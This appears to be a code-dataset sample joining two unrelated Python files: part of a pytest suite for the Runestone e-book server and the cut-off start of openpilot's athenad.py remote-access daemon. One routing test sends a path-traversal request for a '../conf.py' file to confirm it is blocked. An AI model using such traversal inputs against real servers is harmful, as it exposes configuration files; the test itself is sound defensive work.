.select(db.payments.charge_id)
.first()
)
assert payment.charge_id
# Test the LP endpoint.
@pytest.mark.skipif(six.PY2, reason="Requires Python 3.")
def test_lp(test_user_1):
test_user_1.login()
# Check that omitting parameters produces an error.
ret = test_user_1.hsblog(event="lp_build")
assert "No feedback provided" in ret["errors"][0]
# Check that database entries are validated.
ret = test_user_1.hsblog(
event="lp_build",
# This div_id is too long. Everything else is OK.
div_id="X" * 1000,
course=test_user_1.course.course_name,
builder="unsafe-python",
answer=json.dumps({"code_snippets": ["def one(): return 1"]}),
)
assert "div_id" in ret["errors"][0]
# Check a passing case
def assert_passing():
ret = test_user_1.hsblog(
event="lp_build",
div_id="lp_demo_1",
course=test_user_1.course.course_name,
builder="unsafe-python",
answer=json.dumps({"code_snippets": ["def one(): return 1"]}),
)
assert "errors" not in ret
assert ret["correct"] == 100
assert_passing()
# Send lots of jobs to test out the queue. Skip this for now -- not all the useinfo entries get deleted, which causes ``test_getNumOnline`` to fail.
if False:
threads = [Thread(target=assert_passing) for x in range(5)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Test dynamic book routing.
def test_dynamic_book_routing_1(test_client, test_user_1):
test_user_1.login()
dbr_tester(test_client, test_user_1, True)
# Test that a draft is accessible only to instructors.
test_user_1.make_instructor()
test_user_1.update_profile(course_name=test_user_1.course.course_name)
test_client.validate(
"books/draft/{}/index.html".format(test_user_1.course.base_course),
"The red car drove away.",
)
# Test the no-login case.
def test_dynamic_book_routing_2(test_client, test_user_1):
test_client.logout()
# Test for a book that doesn't require a login. First, change the book to not require a login.
db = test_user_1.runestone_db_tools.db
db(db.courses.course_name == test_user_1.course.base_course).update(
login_required=False
)
db.commit()
dbr_tester(test_client, test_user_1, False)
def dbr_tester(test_client, test_user_1, is_logged_in):
# Test error cases.
validate = test_client.validate
base_course = test_user_1.course.base_course
# A non-existant course.
if is_logged_in:
validate("books/published/xxx", "Course Selection")
else:
validate("books/published/xxx", expected_status=404)
# A non-existant page.
validate("books/published/{}/xxx".format(base_course), expected_status=404)
# A directory.
validate(
"books/published/{}/test_chapter_1".format(base_course), expected_status=404
)
# Attempt to access files outside a course.
validate("books/published/{}/../conf.py".format(base_course), expected_status=404)
# Attempt to access a course we're not registered for. TODO: Need to create another base course for this to work.
##if is_logged_in:
## #validate('books/published/{}/index.html'.format(base_course), [
## 'Sorry you are not registered for this course.'
## ])
# A valid page. Check the book config as well.
validate(
"books/published/{}/index.html".format(base_course),
[
"The red car drove away.",
"eBookConfig.course = '{}';".format(
test_user_1.course.course_name if is_logged_in else base_course
),
"eBookConfig.basecourse = '{}';".format(base_course),
],
)
# Drafts shouldn't be accessible by students.
validate(
"books/draft/{}/index.html".format(base_course),
"Insufficient privileges" if is_logged_in else "Username",
)
# Check routing in a base course.
if is_logged_in:
test_user_1.update_profile(
course_name=test_user_1.course.base_course, is_free=True
)
validate(
"books/published/{}/index.html".format(base_course),
[
"The red car drove away.",
"eBookConfig.course = '{}';".format(base_course),
"eBookConfig.basecourse = '{}';".format(base_course),
],
)
# Test static content.
validate(
"books/published/{}/_static/runestone-custom-sphinx-bootstrap.css".format(
base_course
),
"background-color: #fafafa;",
)
def test_assignments(test_client, runestone_db_tools, test_user):
course_3 = runestone_db_tools.create_course("test_course_3")
test_instructor_1 = test_user("test_instructor_1", "password_1", course_3)
test_instructor_1.make_instructor()
test_instructor_1.login()
db = runestone_db_tools.db
name_1 = "test_assignment_1"
name_2 = "test_assignment_2"
name_3 = "test_assignment_3"
# Create an assignment -- using createAssignment
test_client.post("admin/createAssignment", data=dict(name=name_1))
assign1 = (
db(
(db.assignments.name == name_1)
& (db.assignments.course == test_instructor_1.course.course_id)
)
.select()
.first()
)
assert assign1
# Make sure you can't create two assignments with the same name
test_client.post("admin/createAssignment", data=dict(name=name_1))
assert "EXISTS" in test_client.text
# Rename assignment
test_client.post("admin/createAssignment", data=dict(name=name_2))
assign2 = (
db(
(db.assignments.name == name_2)
& (db.assignments.course == test_instructor_1.course.course_id)
)
.select()
.first()
)
assert assign2
test_client.post(
"admin/renameAssignment", data=dict(name=name_3, original=assign2.id)
)
assert db(db.assignments.name == name_3).select().first()
assert not db(db.assignments.name == name_2).select().first()
# Make sure you can't rename an assignment to an already used assignment
test_client.post(
"admin/renameAssignment", data=dict(name=name_3, original=assign1.id)
)
assert "EXISTS" in test_client.text
# Delete an assignment -- using removeassignment
test_client.post("admin/removeassign", data=dict(assignid=assign1.id))
assert not db(db.assignments.name == name_1).select().first()
test_client.post("admin/removeassign", data=dict(assignid=assign2.id))
assert not db(db.assignments.name == name_3).select().first()
test_client.post("admin/removeassign", data=dict(assignid=9999999))
assert "Error" in test_client.text
def test_instructor_practice_admin(test_client, runestone_db_tools, test_user):
course_4 = runestone_db_tools.create_course("test_course_1")
test_student_1 = test_user("test_student_1", "password_1", course_4)
test_student_1.logout()
test_instructor_1 = test_user("test_instructor_1", "password_1", course_4)
test_instructor_1.make_instructor()
test_instructor_1.login()
db = runestone_db_tools.db
course_start_date = datetime.datetime.strptime(
course_4.term_start_date, "%Y-%m-%d"
).date()
start_date = course_start_date + datetime.timedelta(days=13)
end_date = datetime.datetime.today().date() + datetime.timedelta(days=30)
max_practice_days = 40
max_practice_questions = 400
day_points = 1
question_points = 0.2
questions_to_complete_day = 5
graded = 0
# Test the practice tool settings for the course.
flashcard_creation_method = 2
test_client.post(
"admin/practice",
data={
"StartDate": start_date,
"EndDate": end_date,
"graded": graded,
"maxPracticeDays": max_practice_days,
"maxPracticeQuestions": max_practice_questions,
"pointsPerDay": day_points,
"pointsPerQuestion": question_points,
"questionsPerDay": questions_to_complete_day,
"flashcardsCreationType": 2,
"question_points": question_points,
},
)
practice_settings_1 = (
db(
(db.course_practice.auth_user_id == test_instructor_1.user_id)
& (db.course_practice.course_name == course_4.course_name)
& (db.course_practice.start_date == start_date)
& (db.course_practice.end_date == end_date)
& (
db.course_practice.flashcard_creation_method
== flashcard_creation_method
)
& (db.course_practice.graded == graded)
)
.select()
.first()
)
assert practice_settings_1
if practice_settings_1.spacing == 1:
assert practice_settings_1.max_practice_days == max_practice_days
assert practice_settings_1.day_points == day_points
assert (
practice_settings_1.questions_to_complete_day == questions_to_complete_day
)
else:
assert practice_settings_1.max_practice_questions == max_practice_questions
assert practice_settings_1.question_points == question_points
# Test instructor adding a subchapter to the practice tool for students.
# I need to call set_tz_offset to set timezoneoffset in the session.
test_client.post("ajax/set_tz_offset", data={"timezoneoffset": 0})
# The reason I'm manually stringifying the list value is that test_client.post does something strange with compound objects instead of passing them to json.dumps.
test_client.post(
"admin/add_practice_items",
data={"data": '["1. Test chapter 1/1.2 Subchapter B"]'},
)
practice_settings_1 = (
db(
(db.user_topic_practice.user_id == test_student_1.user_id)
& (db.user_topic_practice.course_name == course_4.course_name)
& (db.user_topic_practice.chapter_label == "test_chapter_1")
& (db.user_topic_practice.sub_chapter_label == "subchapter_b")
)
.select()
.first()
)
assert practice_settings_1
def test_deleteaccount(test_client, runestone_db_tools, test_user):
course_3 = runestone_db_tools.create_course("test_course_3")
the_user = test_user("user_to_delete", "password_1", course_3)
the_user.login()
validate = the_user.test_client.validate
the_user.hsblog(
event="mChoice",
act="answer:1:correct",
answer="1",
correct="T",
div_id="subc_b_1",
course="test_course_3",
)
validate("default/delete", "About Runestone", data=dict(deleteaccount="checked"))
db = runestone_db_tools.db
res = db(db.auth_user.username == "user_to_delete").select().first()
print(res)
time.sleep(2)
assert not db(db.useinfo.sid == "user_to_delete").select().first()
assert not db(db.code.sid == "user_to_delete").select().first()
for t in [
"clickablearea",
"codelens",
"dragndrop",
"fitb",
"lp",
"mchoice",
"parsons",
"shortanswer",
]:
assert (
not db(db["{}_answers".format(t)].sid == "user_to_delete").select().first()
)
# Test the grades report.
# When this test fails it is very very difficult to figure out why.
# The data structures being compared are very large which makes it very very
# difficult to pin down what is failing. In addition it seems there is a dictionary
# in here somewhere where the order of things shifts around. I think it is currenly
# broken because more components now return a percent correct value.
@pytest.mark.skip(reason="TODO: This test is unpredictable and needs to be updated.")
def test_grades_1(runestone_db_tools, test_user, tmp_path):
# Create test users.
course = runestone_db_tools.create_course()
course_name = course.course_name
# **Create test data**
# ======================
# Create test users.
test_user_array = [
test_user(
"test_user_{}".format(index), "x", course, last_name="user_{}".format(index)
)
for index in range(4)
]
def assert_passing(index, *args, **kwargs):
res = test_user_array[index].hsblog(*args, **kwargs)
assert "errors" not in res
# Prepare common arguments for each question type.
shortanswer_kwargs = dict(
event="shortanswer", div_id="test_short_answer_1", course=course_name
)
fitb_kwargs = dict(event="fillb", div_id="test_fitb_1", course=course_name)
mchoice_kwargs = dict(event="mChoice", div_id="test_mchoice_1", course=course_name)
lp_kwargs = dict(
event="lp_build",
div_id="lp_demo_1",
course=course_name,
builder="unsafe-python",
)
unittest_kwargs = dict(event="unittest", div_id="units2", course=course_name)
# *User 0*: no data supplied
##----------------------------
# *User 1*: correct answers
##---------------------------
# It doesn't matter which user logs out, since all three users share the same client.
logout = test_user_array[2].test_client.logout
logout()
test_user_array[1].login()
assert_passing(1, act=test_user_array[1].username, **shortanswer_kwargs)
assert_passing(1, answer=json.dumps(["red", "away"]), **fitb_kwargs)
assert_passing(1, answer="0", correct="T", **mchoice_kwargs)
assert_passing(
1, answer=json.dumps({"code_snippets": ["def one(): return 1"]}), **lp_kwargs
)
assert_passing(1, act="percent:100:passed:2:failed:0", **unittest_kwargs)
# *User 2*: incorrect answers
##----------------------------
logout()
test_user_array[2].login()
# Add three shortanswer answers, to make sure the number of attempts is correctly recorded.
for x in range(3):
assert_passing(2, act=test_user_array[2].username, **shortanswer_kwargs)
assert_passing(2, answer=json.dumps(["xxx", "xxxx"]), **fitb_kwargs)
assert_passing(2, answer="1", correct="F", **mchoice_kwargs)
assert_passing(
2, answer=json.dumps({"code_snippets": ["def one(): return 2"]}), **lp_kwargs
)
assert_passing(2, act="percent:50:passed:1:failed:1", **unittest_kwargs)
# *User 3*: no data supplied, and no longer in course.
##----------------------------------------------------
# Wait until the autograder is run to remove the student, so they will have a grade but not have any submissions.
# **Test the grades_report endpoint**
##====================================
tu = test_user_array[2]
def grades_report(assignment, *args, **kwargs):
return tu.test_client.validate(
"assignments/grades_report",
*args,
data=dict(chap_or_assign=assignment, report_type="assignment"),
**kwargs
)
# Test not being an instructor.
grades_report("", "About Runestone")
tu.make_instructor()
# Test an invalid assignment.
grades_report("", "Unknown assignment")
# Create an assignment.
assignment_name = "test_assignment"
assignment_id = json.loads(
tu.test_client.validate(
"admin/createAssignment", data={"name": assignment_name}
)
)[assignment_name]
assignment_kwargs = dict(
assignment=assignment_id, autograde="pct_correct", which_to_grade="first_answer"
)
# Add questions to the assignment.
def add_to_assignment(question_kwargs, points):
assert (
tu.test_client.validate(
"admin/add__or_update_assignment_question",
data=dict(
question=question_kwargs["div_id"],
points=points,
**assignment_kwargs
),
)
!= json.dumps("Error")
)
# Determine the order of the questions and the _`point values`.
add_to_assignment(shortanswer_kwargs, 0)
add_to_assignment(fitb_kwargs, 1)
add_to_assignment(mchoice_kwargs, 2)
add_to_assignment(lp_kwargs, 3)
add_to_assignment(unittest_kwargs, 4)
# Autograde the assignment.
assignment_kwargs = dict(data={"assignment": assignment_name})
assert json.loads(
tu.test_client.validate("assignments/autograde", **assignment_kwargs)
)["message"].startswith("autograded")
assert json.loads(
tu.test_client.validate("assignments/calculate_totals", **assignment_kwargs)
)["success"]
# Remove test user 3 from the course. They can't be removed from the current course, so create a new one then add this user to it.
logout()
tu = test_user_array[3]
tu.login()
new_course = runestone_db_tools.create_course("random_course_name")
tu.update_profile(course_name=new_course.course_name, is_free=True)
tu.coursechooser(new_course.course_name)
tu.removecourse(course_name)
# **Test this assignment.**
# ===========================
# Log back in as the instructor.
logout()
tu = test_user_array[2]
tu.login()
# Now, we can get the report.
grades = json.loads(grades_report(assignment_name))
# Define a regex string comparison.
class RegexEquals:
def __init__(self, regex):
self.regex = re.compile(regex)
def __eq__(self, other):
return bool(re.search(self.regex, other))
# See if a date in ISO format followed by a "Z" is close to the current time.
class AlmostNow:
def __eq__(self, other):
# Parse the date string. Assume it ends with a Z and discard this.
assert other and other[-1] == "Z"
# Per the `docs <https://docs.python.org/3/library/datetime.html#datetime.date.fromisoformat>`_, this function requires Python 3.7+.
if sys.version_info >= (3, 7):
dt = datetime.datetime.fromisoformat(other[:-1])
return datetime.datetime.utcnow() - dt < datetime.timedelta(minutes=1)
else:
# Hope for the best on older Python.
return True
# These are based on the data input for each user earlier in this test.
expected_grades = {
"colHeaders": [
"userid",
"Family name",
"Given name",
"e-mail",
"avg grade (%)",
"1",
"1",
"1",
"2.1",
"2",
],
"data": [
[
"div_id",
"",
"",
"",
"",
"test_short_answer_1",
"test_fitb_1",
"test_mchoice_1",
"lp_demo_1",
"units2",
],
[
"location",
"",
"",
"",
"",
"index - ",
"index - ",
"index - ",
"lp_demo.py - ",
"index - ",
],
[
"type",
"",
"",
"",
"",
"shortanswer",
"fillintheblank",
"mchoice",
"lp_build",
"activecode",
],
# See the `point values`_ assigned earlier.
["points", "", "", "", "", 0, 1, 2, 3, 4],
["avg grade (%)", "", "", "", ""],
["avg attempts", "", "", "", ""],
["test_user_0", "user_0", "test", "test_user_0@foo.com", 0.0],
["test_user_1", "user_1", "test", "test_user_1@foo.com", 1.0],
["test_user_2", "user_2", "test", "test_user_2@foo.com", 0.2],
["test_user_3", "user_3", "test", "test_user_3@foo.com", 0.0],
],
# Correct since the first 3 questions are all on the index page.
"mergeCells": [{"col": 5, "colspan": 3, "row": 1, "rowspan": 1}],
"orig_data": [
# User 0: not submitted.
[
# The format is:
# ``[timestamp, score, answer, correct, num_attempts]``.
[None, 0.0, None, None, None], # shortanswer
[None, 0.0, None, None, None], # fillintheblank
[None, 0.0, None, None, None], # mchoice
[None, 0.0, {}, None, None], # lp_build
[None, 0.0, "", None, None], # activecode
],
# User 1: all correct.
[
[AlmostNow(), 0.0, "test_user_1", None, 1],
[AlmostNow(), 1.0, ["red", "away"], True, 1],
[AlmostNow(), 2.0, [0], True, 1],
[
AlmostNow(),
3.0,
{"code_snippets": ["def one(): return 1"], "resultString": ""},
100.0,
1,
],
[AlmostNow(), 4.0, "percent:100:passed:2:failed:0", True, 1],
],
# User 2: all incorrect.
[
[AlmostNow(), 0.0, "test_user_2", None, 3],
[AlmostNow(), 0.0, ["xxx", "xxxx"], False, 1],
[AlmostNow(), 0.0, [1], False, 1],
[
AlmostNow(),
0.0,
{
"code_snippets": ["def one(): return 2"],
"resultString": RegexEquals(
"Traceback \\(most recent call last\\):\n"
" File "
# Use a regex for the file's path.
'"\\S*lp_demo-test.py", '
"line 6, in <module>\n"
" assert one\\(\\) == 1\n"
"AssertionError"
),
},
0.0,
1,
],
[AlmostNow(), 2.0, "percent:50:passed:1:failed:1", False, 1],
],
# User 3: not submitted.
[
# The format is:
[None, 0.0, None, None, None],
[None, 0.0, None, None, None],
[None, 0.0, None, None, None],
[None, 0.0, {}, None, None],
[None, 0.0, "", None, None],
],
],
}
# Note: on test failure, pytest will report as incorrect all the ``AlmostNow()`` and ``RegexEquals`` items, even though they may have actually compared as equal.
# assert grades == expected_grades
# lets break this up a bit.
for k in expected_grades:
assert grades[k] == expected_grades[k]
logout()
# Test with no login.
grades_report("", "About Runestone")
def test_pageprogress(test_client, runestone_db_tools, test_user_1):
test_user_1.login()
test_user_1.hsblog(
event="mChoice",
act="answer:1:correct",
answer="1",
correct="T",
div_id="subc_b_1",
course=test_user_1.course.course_name,
)
# Since the user has answered the question the count for subc_b_1 should be 1
# cannot test the totals on the client without javascript but that is covered in the
# selenium tests on the components side.
test_user_1.test_client.validate(
"books/published/{}/test_chapter_1/subchapter_b.html".format(
test_user_1.course.base_course
),
'"subc_b_1": 1',
)
assert '"LearningZone_poll": 0' in test_user_1.test_client.text
assert '"subc_b_fitb": 0' in test_user_1.test_client.text
def test_lockdown(test_client, test_user_1):
test_user_1.login()
base_course = test_user_1.course.base_course
res = test_client.validate("books/published/{}/index.html".format(base_course))
assert '/default/user/login"> </a>' in res
assert "Runestone in social media:" in res
assert ">Change Course</a></li>" in res
assert 'id="profilelink">Edit' in res
assert '<ul class="dropdown-menu user-menu">' in res
assert "<span id='numuserspan'></span><span class='loggedinuser'></span>" in res
assert '<script async src="https://hypothes.is/embed.js"></script>' in res
# Test server-side logic in FITB questions.
def test_fitb(test_user_1, selenium_user):
selenium_user_1 = selenium_user(test_user_1)
selenium_user_1.login()
# Browse to the page with a fitb question.
d = selenium_user_1.driver
d.rs_get("books/published/test_course_1/index.html")
id = "test_fitb_numeric"
fitb = d.find_element_by_id(id)
blank = fitb.find_elements_by_tag_name("input")[0]
check_me_button = fitb.find_element_by_tag_name("button")
feedback_id = id + "_feedback"
wait = WebDriverWait(d, 10)
# Enter a value and check it
def check_val(val, feedback_str="Correct"):
# Erase any previous answer text.
blank.clear()
blank.send_keys(val)
check_me_button.click()
wait.until(EC.text_to_be_present_in_element((By.ID, feedback_id), feedback_str))
check_val("10")
# Check this next, since it expects a different answer -- two correct answers in a row are harder to distinguish (has the new text been updated yet or not?).
check_val("11", "Close")
# Ensure spaces don't prevent correct numeric parsing.
check_val(" 10 ")
selenium_user_1.logout()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import bz2
import hashlib
import io
import json
import os
import queue
import random
import select
import socket
import subprocess
import sys
import tempfile
import threading
import time
from collections import namedtuple
from datetime import datetime
from functools import partial
from typing import Any, Dict
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import (ABNF, WebSocketException, WebSocketTimeoutException,
create_connection)
import cereal.messaging as messaging
from cereal import log
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.file_helpers import CallbackReader
from common.params import Params
from common.realtime import sec_since_boot, set_core_affinity
from system.hardware import HARDWARE, PC, AGNOS
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.statsd import STATS_DIR
from system.swaglog import SWAGLOG_DIR, cloudlog
from system.version import get_commit, get_origin, get_short_branch, get_version
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
MAX_AGE = 31 * 24 * 3600 # seconds
WS_FRAME_SIZE = 4096
NetworkType = log.DeviceState.NetworkType
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
low_priority_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress', 'allow_cellular'], defaults=(0, False, 0, False))
cur_upload_items: Dict[int, Any] = {}
def strip_bz2_extension(fn):
if fn.endswith('.bz2'):
return fn[:-4]
return fn
class AbortTransferException(Exception):
pass
class UploadQueueCache():
params = Params()
@staticmethod
def initialize(upload_queue):
try:
upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
if upload_queue_json is not None:
for item in json.loads(upload_queue_json):
upload_queue.put(UploadItem(**item))
except Exception:
cloudlog.exception("athena.UploadQueueCache.initialize.exception")
@staticmethod
def cache(upload_queue):
try:
items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
except Exception:
cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
threading.Thread(target=stat_handler, args=(end_event,), name='stat_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def retry_upload(tid: int, end_event: threading.Event, increase_count: bool = True) -> None:
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
new_retry_count = item.retry_count + 1 if increase_count else item.retry_count
item = item._replace(
retry_count=new_retry_count,
progress=0,
current=False
)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
def upload_handler(end_event: threading.Event) -> None:
sm = messaging.SubMaster(['deviceState'])
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
# Remove item if too old
age = datetime.now() - datetime.fromtimestamp(cur_upload_items[tid].created_at / 1000)
if age.total_seconds() > MAX_AGE:
cloudlog.event("athena.upload_handler.expired", item=cur_upload_items[tid], error=True)
continue
# Check if uploading over metered connection is allowed
sm.update(0)
metered = sm['deviceState'].networkMetered
network_type = sm['deviceState'].networkType.raw
if metered and (not cur_upload_items[tid].allow_cellular):
retry_upload(tid, end_event, False)
continue
try:
def cb(sz, cur):
# Abort transfer if connection changed to metered after starting upload
sm.update(0)
metered = sm['deviceState'].networkMetered
if metered and (not cur_upload_items[tid].allow_cellular):
raise AbortTransferException
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
fn = cur_upload_items[tid].path
try:
sz = os.path.getsize(fn)
except OSError:
sz = -1
cloudlog.event("athena.upload_handler.upload_start", fn=fn, sz=sz, network_type=network_type, metered=metered, retry_count=cur_upload_items[tid].retry_count)
response = _do_upload(cur_upload_items[tid], cb)
if response.status_code not in (200, 201, 401, 403, 412):
cloudlog.event("athena.upload_handler.retry", status_code=response.status_code, fn=fn, sz=sz, network_type=network_type, metered=metered)
retry_upload(tid, end_event)
else:
cloudlog.event("athena.upload_handler.success", fn=fn, sz=sz, network_type=network_type, metered=metered)
UploadQueueCache.cache(upload_queue)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError):
cloudlog.event("athena.upload_handler.timeout", fn=fn, sz=sz, network_type=network_type, metered=metered)
retry_upload(tid, end_event)
except AbortTransferException:
cloudlog.event("athena.upload_handler.abort", fn=fn, sz=sz, network_type=network_type, metered=metered)
retry_upload(tid, end_event, False)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
path = upload_item.path
compress = False
# If file does not exist, but does exist without the .bz2 extension we will compress on the fly
if not os.path.exists(path) and os.path.exists(strip_bz2_extension(path)):
path = strip_bz2_extension(path)
compress = True
with open(path, "rb") as f:
if compress:
cloudlog.event("athena.upload_handler.compress", fn=path, fn_orig=upload_item.path)
data = bz2.compress(f.read())
size = len(data)
data = io.BytesIO(data)
else:
size = os.fstat(f.fileno()).st_size
data = f
if callback:
data = CallbackReader(data, callback, size)
return requests.put(upload_item.url,
data=data,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion() -> Dict[str, str]:
return {
"version": get_version(),
"remote": get_origin(''),
"branch": get_short_branch(''),
"commit": get_commit(default=''),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
return uploadFilesToUrls([{
"fn": fn,
"url": url,
"headers": headers,
}])
@dispatcher.add_method
def uploadFilesToUrls(files_data):
items = []
failed = []
for file in files_data:
fn = file.get('fn', '')
if len(fn) == 0 or fn[0] == '/' or '..' in fn or 'url' not in file:
failed.append(fn)
continue
path = os.path.join(ROOT, fn)
if not os.path.exists(path) and not os.path.exists(strip_bz2_extension(path)):
failed.append(fn)
continue
item = UploadItem(
path=path,
url=file['url'],
headers=file.get('headers', {}),
created_at=int(time.time() * 1000),
id=None,
allow_cellular=file.get('allow_cellular', False),
)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
items.append(item._asdict())
UploadQueueCache.cache(upload_queue)
resp = {"enqueued": len(items), "items": items}
if failed:
resp["failed"] = failed
return resp
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
if not isinstance(upload_id, list):
upload_id = [upload_id]
uploading_ids = {item.id for item in list(upload_queue.queue)}
cancelled_ids = uploading_ids.intersection(upload_id)
if len(cancelled_ids) == 0:
return 404
cancelled_uploads.update(cancelled_ids)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
@dispatcher.add_method
def setBandwithLimit(upload_speed_kbps, download_speed_kbps):
if not AGNOS:
return {"success": 0, "error": "only supported on AGNOS"}
try:
HARDWARE.set_bandwidth_limit(upload_speed_kbps, download_speed_kbps)
return {"success": 1}
except subprocess.CalledProcessError as e:
return {"success": 0, "error": "failed to set limit", "stdout": e.stdout, "stderr": e.stderr}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
dongle_id = Params().get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(False)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworkMetered():
network_type = HARDWARE.get_network_type()
return HARDWARE.get_network_metered(network_type)
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from system.camerad.snapshot.snapshot import jpeg_write, snapshot
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
